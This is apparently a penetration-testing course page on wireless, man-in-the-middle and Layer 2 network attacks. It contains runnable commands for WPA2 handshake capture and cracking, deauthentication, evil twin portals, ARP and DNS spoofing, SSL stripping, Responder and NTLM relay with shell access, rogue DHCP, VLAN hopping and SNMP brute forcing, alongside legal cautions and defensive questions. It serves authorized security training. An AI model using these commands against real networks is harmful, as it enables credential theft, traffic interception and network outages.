CSY202 Week 11 Intermediate

Practice wireless and MITM attacks before moving to reading resources.

Applied Cryptography

Track your progress through this week's content

Opening Framing: The Invisible Attack Surface

Most penetration tests focus on applications and hosts, but the network itself is an attack surface. Wireless networks broadcast beyond physical boundaries. Layer 2 protocols often lack authentication. Network infrastructure can be manipulated to intercept or redirect traffic.

This week covers wireless security testing, man-in-the-middle attacks, network protocol exploitation, and attacks against network infrastructure.

These attacks often provide initial access or enable further exploitation. A compromised wireless network gives internal access. MITM attacks capture credentials. ARP spoofing enables traffic interception.

Key insight: Networks are trusted implicitly. Breaking that trust enables powerful attacks.

1) Wireless Security Fundamentals

Understanding wireless security protocols: 

Wireless Security Evolution:

WEP (Wired Equivalent Privacy):
- Introduced 1997
- Completely broken
- RC4 stream cipher
- Static keys
- Crackable in minutes
- Should never be used

WPA (Wi-Fi Protected Access):
- Introduced 2003
- TKIP encryption
- Improved key management
- Still vulnerabilities (TKIP attacks)
- Legacy, avoid if possible

WPA2 (most common today):
- Introduced 2004
- AES-CCMP encryption
- Strong when properly configured
- Vulnerable to handshake capture + cracking
- Enterprise mode uses 802.1X

WPA3 (newest):
- Introduced 2018
- SAE (Simultaneous Authentication of Equals)
- Protection against offline dictionary attacks
- Forward secrecy
- Still limited adoption

WPA2 Authentication Modes: 

WPA2-Personal (PSK):
- Pre-Shared Key (password)
- Same password for all users
- Vulnerable to handshake capture
- Common in homes and small offices

WPA2-Enterprise:
- Individual credentials per user
- Uses RADIUS server
- 802.1X authentication
- Much more secure
- Common in enterprises

EAP Types (Enterprise):
- PEAP: Protected EAP (username/password)
- EAP-TLS: Certificate-based
- EAP-TTLS: Tunneled TLS

Attack approach differs by mode:
- PSK: Capture handshake, crack password
- Enterprise: Evil twin, credential capture

Wireless Concepts: 

Key terms:

SSID:
- Network name
- Can be hidden (not secure)

BSSID:
- Access point MAC address
- Identifies specific AP

Channel:
- Frequency (1-11 in US for 2.4GHz)
- 5GHz has more channels
- Affects interference

4-Way Handshake:
- Authenticates client to AP
- Establishes encryption keys
- Captured for offline cracking

Beacon frames:
- AP announces presence
- Contains SSID, capabilities
- Sent regularly

Probe requests:
- Client looks for networks
- Can reveal saved networks
- Privacy concern

Key insight: WPA2-PSK security depends entirely on password strength. A weak password means a compromised network.

2) Wireless Attacks

Practical wireless attack techniques:

Wireless Adapter Setup: 

# Wireless adapter requirements:
# - Monitor mode support
# - Packet injection support
# Common chipsets: Atheros, Realtek RTL8812AU

# Check adapter
iwconfig

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Creates wlan0mon

# Verify monitor mode
iwconfig wlan0mon

Network Discovery: 

# Discover wireless networks

# Airodump-ng
sudo airodump-ng wlan0mon

# Output shows:
# BSSID - AP MAC address
# PWR - Signal strength
# CH - Channel
# ENC - Encryption (WPA2, WEP, Open)
# ESSID - Network name

# Target specific channel
sudo airodump-ng wlan0mon -c 6

# Target specific network and capture
sudo airodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture

WPA2 Handshake Capture: 

# Capture 4-way handshake

# Method 1: Wait for client to connect
sudo airodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture
# Wait for "WPA handshake: AA:BB:CC:DD:EE:FF"

# Method 2: Deauthenticate client (force reconnect)
# In second terminal:
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CC:CC:CC:CC:CC:CC wlan0mon

# -0 5 = Send 5 deauth packets
# -a = Target AP BSSID
# -c = Target client MAC (optional)

# Watch first terminal for handshake capture

Cracking WPA2 Passwords: 

# Crack captured handshake

# With aircrack-ng (CPU)
aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt

# With hashcat (GPU - much faster)
# First convert to hashcat format
hcxpcapngtool capture-01.cap -o hash.hc22000

# Crack with hashcat
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

# Rule-based attack
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/best64.rule

# Mask attack (8 char lowercase + 2 digits)
hashcat -m 22000 hash.hc22000 -a 3 ?l?l?l?l?l?l?l?l?d?d

Evil Twin Attack: 

# Create fake AP to capture credentials

# Concept:
# 1. Create AP with same name as target
# 2. Deauth clients from legitimate AP
# 3. Clients connect to your fake AP
# 4. Present fake captive portal
# 5. Capture credentials

# Tools:
# - Hostapd (create AP)
# - Dnsmasq (DHCP/DNS)
# - Apache (captive portal)
# - Wifiphisher (all-in-one)

# With Wifiphisher
sudo wifiphisher

# With Fluxion (automated)
sudo fluxion

# For WPA2-Enterprise:
# Capture RADIUS credentials
# Use hostapd-mana or eaphammer

# eaphammer
./eaphammer -i wlan0 --auth wpa-eap --essid CorpWifi --creds

Key insight: Wireless attacks require physical proximity. In pentests, this often means on-site visits.

3) Man-in-the-Middle Attacks

Intercepting network traffic: 

MITM Concept:

Normal flow:
Client ←→ Server

MITM flow:
Client ←→ Attacker ←→ Server

Attacker can:
- See all traffic
- Modify traffic
- Inject content
- Capture credentials

ARP Spoofing: 

# ARP maps IP to MAC addresses
# ARP has no authentication!

# Tell victim: "I'm the gateway"
# Tell gateway: "I'm the victim"
# Traffic flows through attacker

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# With arpspoof
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1  # Victim
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.100  # Gateway

# With Bettercap (recommended)
sudo bettercap -iface eth0
> net.probe on
> net.sniff on
> arp.spoof on
> set arp.spoof.targets 192.168.1.100

# With Ettercap (GUI available)
sudo ettercap -G

DNS Spoofing: 

# Redirect DNS queries to attacker

# Combined with ARP spoofing:
# Victim DNS query → Attacker → Fake response

# With Bettercap
sudo bettercap -iface eth0
> set dns.spoof.domains target.com
> set dns.spoof.address 192.168.1.50  # Attacker IP
> dns.spoof on
> arp.spoof on

# Now victim's target.com resolves to attacker
# Host phishing page on attacker machine

SSL Stripping: 

# Downgrade HTTPS to HTTP

# Attacker proxies connection:
# Victim ←HTTP→ Attacker ←HTTPS→ Server

# With Bettercap
sudo bettercap -iface eth0
> set http.proxy.sslstrip true
> http.proxy on
> arp.spoof on
> net.sniff on

# Modern protections:
# - HSTS (HTTP Strict Transport Security)
# - HSTS Preload lists
# - Certificate pinning

# HSTS bypass attempts:
# - sslstrip2 / dns2proxy
# - Homograph attacks
# - Still often blocked

Capturing Credentials: 

# Once MITM established:

# Capture with Bettercap
> net.sniff on
> set net.sniff.verbose true

# Capture HTTP credentials automatically
# FTP, Telnet, etc. visible in cleartext

# For encrypted traffic:
# Need SSL stripping or...
# Capture hashes (Responder for Windows)

# Wireshark for deep analysis
# Filter: http.request.method == POST
# Filter: ftp.request.command == PASS

Key insight: MITM attacks work on local networks. Once you're on the network, you can often intercept traffic.

4) Network Protocol Attacks

Exploiting network protocol weaknesses:

LLMNR/NBT-NS Poisoning (Review): 

# When DNS fails, Windows uses:
# - LLMNR (Link-Local Multicast Name Resolution)
# - NBT-NS (NetBIOS Name Service)
# No authentication!

# Responder answers these queries
sudo responder -I eth0 -wrf

# Captures NetNTLMv2 hashes when:
# - User mistypes server name
# - Application looks for non-existent host
# - Automatic service discovery

# Crack captured hashes
hashcat -m 5600 hashes.txt wordlist.txt

# Or relay with ntlmrelayx
ntlmrelayx.py -tf targets.txt -smb2support -i
# Opens interactive shell on successful relay

DHCP Attacks: 

# DHCP has no authentication

# DHCP Starvation:
# Exhaust DHCP pool
# Clients can't get addresses
# DoS attack

# Rogue DHCP:
# Respond to DHCP requests
# Provide malicious gateway/DNS
# Enables MITM

# With Yersinia
yersinia dhcp -attack 1  # Starvation

# With Metasploit
use auxiliary/server/dhcp
set SRVHOST 192.168.1.50
set NETMASK 255.255.255.0
set ROUTER 192.168.1.50  # Attacker as gateway
set DNSSERVER 192.168.1.50
run

VLAN Hopping: 

# Access other VLANs from restricted VLAN

# Switch Spoofing:
# Pretend to be a trunk port
# Receive traffic from all VLANs

# With Yersinia
yersinia dtp -attack 1

# Double Tagging:
# Add two VLAN tags
# Outer tag stripped by first switch
# Inner tag forwards to target VLAN
# Only works in specific configurations

# Modern switches usually prevent these
# But worth testing

STP Attacks: 

# Spanning Tree Protocol
# Prevents loops, elects root bridge

# Become root bridge:
# Send BPDUs with lower priority
# Traffic flows through attacker

# With Yersinia
yersinia stp -attack 4  # Become root

# Impact:
# - Intercept traffic
# - DoS (disrupt topology)

# Mitigations:
# - BPDU Guard
# - Root Guard
# - Proper port security

Key insight: Layer 2 attacks are often overlooked. Many networks haven't implemented proper L2 security.

5) Network Infrastructure Attacks

Targeting routers, switches, and other infrastructure:

Default Credentials: 

# Network devices often have:
# - Default passwords
# - Weak passwords
# - Common passwords

# Common defaults:
admin:admin
admin:password
cisco:cisco
enable:enable

# Default credential databases:
# https://cirt.net/passwords
# https://default-password.info

# Check for web interfaces
nmap -p 80,443,8080,8443 192.168.1.0/24

# Check for SNMP
nmap -sU -p 161 192.168.1.0/24
snmpwalk -v2c -c public 192.168.1.1

# Common SNMP community strings:
public, private, cisco, admin

SNMP Exploitation: 

# SNMP can reveal extensive info

# With read access (public):
snmpwalk -v2c -c public 192.168.1.1

# Get system info
snmpwalk -v2c -c public 192.168.1.1 system

# Get interface info
snmpwalk -v2c -c public 192.168.1.1 interfaces

# Get ARP table
snmpwalk -v2c -c public 192.168.1.1 ipNetToMedia

# With write access (private):
# Modify configurations
# Change routing
# Disable ports

# Brute force community strings
onesixtyone -c community-strings.txt 192.168.1.1

Router/Switch Exploitation: 

# If you get credentials:

# Cisco IOS
enable
show running-config
show ip route
show interfaces
show cdp neighbors

# Extract password hashes
show running-config | include password
show running-config | include secret

# Cisco Type 5 hash (MD5)
# Crackable with hashcat -m 500

# Cisco Type 7 (weak, reversible)
# Use online decoder

# Impact of router compromise:
# - Traffic interception
# - Route manipulation
# - Access to other network segments
# - Persistent access

IPv6 Attacks: 

# IPv6 often enabled but not secured

# Many devices auto-configure IPv6
# Security controls may not apply

# MITM via IPv6
# Advertise as IPv6 router
# Clients prefer IPv6 over IPv4

# With mitm6
sudo mitm6 -d domain.local

# Combine with ntlmrelayx
ntlmrelayx.py -6 -t ldaps://dc.domain.local -wh fakewpad.domain.local -l loot

# Can capture creds even on IPv4-only networks
# Because Windows prefers IPv6

Key insight: Network infrastructure is often neglected in security. Compromising a core router has massive impact.

Real-World Context: Network Testing Considerations

Professional considerations for network attacks:

Physical Access: Wireless attacks require physical proximity. Some organizations have pentesters perform on-site "war walking" to assess wireless security.

Network Disruption: Many network attacks can cause disruption. ARP spoofing can degrade performance. DHCP starvation causes outages. STP attacks can crash networks. Coordinate with the client.

Legal Considerations: Wireless attacks on networks you don't own are illegal. Capturing traffic from other networks is illegal. Even passive monitoring can be problematic. Ensure clear scope.

MITRE ATT&CK Mapping:

  • T1557 - Adversary-in-the-Middle: ARP spoofing, LLMNR poisoning
  • T1040 - Network Sniffing: Traffic capture
  • T1200 - Hardware Additions: Rogue devices
  • T1599 - Network Boundary Bridging: VLAN hopping

Key insight: Network attacks can have broad impact. Always coordinate with network teams and have rollback plans.

Guided Lab: Wireless and MITM Practice

Practice network attacks in your lab environment.

Lab Requirements

# For wireless attacks:
# - Compatible wireless adapter (monitor mode)
# - Target AP you own (or isolated lab AP)

# For MITM attacks:
# - At least 2 VMs on same network
# - Kali (attacker)
# - Target VM (victim)

Step 1: Wireless Reconnaissance

# If you have wireless adapter:

# Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Scan for networks
sudo airodump-ng wlan0mon

# Document:
# - Networks visible
# - Encryption types
# - Client associations

Step 2: ARP Spoofing Lab

# On Kali (attacker):

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# Start Bettercap
sudo bettercap -iface eth0
> net.probe on
> net.sniff on
> set arp.spoof.targets [victim-ip]
> arp.spoof on

# On victim, browse to HTTP site
# Watch credentials captured in Bettercap

Step 3: Responder Lab

# On Kali:
sudo responder -I eth0 -wrf

# On Windows victim:
# Browse to \\nonexistent\share
# Or \\[attacker-ip]\share

# Watch Responder capture NetNTLMv2

Step 4: Documentation

# Document:
# - Attack performed
# - Tools used
# - Data captured
# - Potential impact

Reflection (mandatory)

  1. Which attacks would be detected by network monitoring?
  2. How would you defend against ARP spoofing?
  3. What legitimate business activities could MITM disrupt?
  4. Why do these Layer 2 attacks still work?

Week 11 Outcome Check

By the end of this week, you should be able to:

Next week: Capstone—complete penetration test from start to finish.

🎯 Hands-On Labs (Free & Essential)

Practice wireless and MITM attacks before moving to reading resources.

🎮 TryHackMe: WiFi Hacking 101

What you'll do: Capture WPA handshakes and practice cracking workflows.
Why it matters: Wireless security is a common entry point in audits.
Time estimate: 2-3 hours

Start TryHackMe WiFi Hacking 101 →

🎮 TryHackMe: Wireless

What you'll do: Explore wireless attack paths and defensive controls.
Why it matters: Understanding wireless protocols informs safer testing.
Time estimate: 1.5-2 hours

Start TryHackMe Wireless →

🏁 PicoCTF Practice: Forensics (PCAP Analysis)

What you'll do: Analyze packet captures for credentials and attack traces.
Why it matters: MITM work relies on strong packet analysis skills.
Time estimate: 1-2 hours

Start PicoCTF Forensics →

🛡️ Lab: zkSNARK Demonstration

What you'll do: Run a simple zero-knowledge proof demo and summarize results.
Deliverable: Screenshot/output + short explanation of ZK use cases.
Why it matters: Modern crypto impacts authentication and privacy systems.
Time estimate: 45-60 minutes

💡 Lab Tip: Get explicit authorization before wireless testing—scope matters.

🛡️ Modern Cryptography Concepts

Wireless and network attacks often intersect with encryption. Understanding modern crypto helps you evaluate defenses. 

Modern concepts:
- Zero-knowledge proofs (ZK)
- Homomorphic encryption (compute on ciphertext)
- Secure multi-party computation
- Privacy-preserving authentication

📚 Building on CSY101 Week-14: Tie crypto innovation to risk and governance planning.

Resources

Complete the required resources to build your foundation.

Lab: Network Attack Chain

Goal: Execute a complete network attack chain from reconnaissance to credential capture.

Part 1: Network Reconnaissance

  1. Map your lab network
  2. Identify all hosts
  3. Identify network infrastructure
  4. Document network topology

Part 2: MITM Attack

  1. Perform ARP spoofing against target
  2. Capture network traffic
  3. Identify any cleartext credentials
  4. Attempt DNS spoofing

Part 3: Protocol Attacks

  1. Run Responder
  2. Capture NetNTLMv2 hashes
  3. Attempt to crack hashes
  4. Document credential exposure

Part 4: Wireless Assessment (if applicable)

  1. Discover wireless networks
  2. Capture WPA2 handshake
  3. Attempt password crack
  4. Document wireless security posture

Part 5: Report

  1. Document all attacks performed
  2. Evidence of successful attacks
  3. Impact assessment
  4. Defensive recommendations

Deliverable (submit):

Checkpoint Questions

  1. What is the difference between WPA2-Personal and WPA2-Enterprise?
  2. What is captured in a WPA2 4-way handshake?
  3. How does ARP spoofing enable MITM attacks?
  4. What is LLMNR poisoning and why does it work?
  5. What is an evil twin attack?
  6. Why are Layer 2 attacks often successful?

Week 11 Quiz

Test your understanding of wireless security, MITM attacks, and network protocol exploitation.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Take Quiz

Weekly Reflection

Reflection Prompt (200-300 words):

This week you learned wireless and network attacks—techniques that exploit the fundamental trust in network communications. You captured credentials, intercepted traffic, and exploited protocol weaknesses.

Reflect on these questions:

A strong reflection will connect technical attacks to practical defensive recommendations.

Verified Resources & Videos

Network attacks expand your toolkit beyond application and host exploitation. Understanding how networks can be compromised is essential for comprehensive security testing. Next week: your capstone brings together everything you've learned in a complete penetration test.

← Previous: Week 10 Next: Week 12 →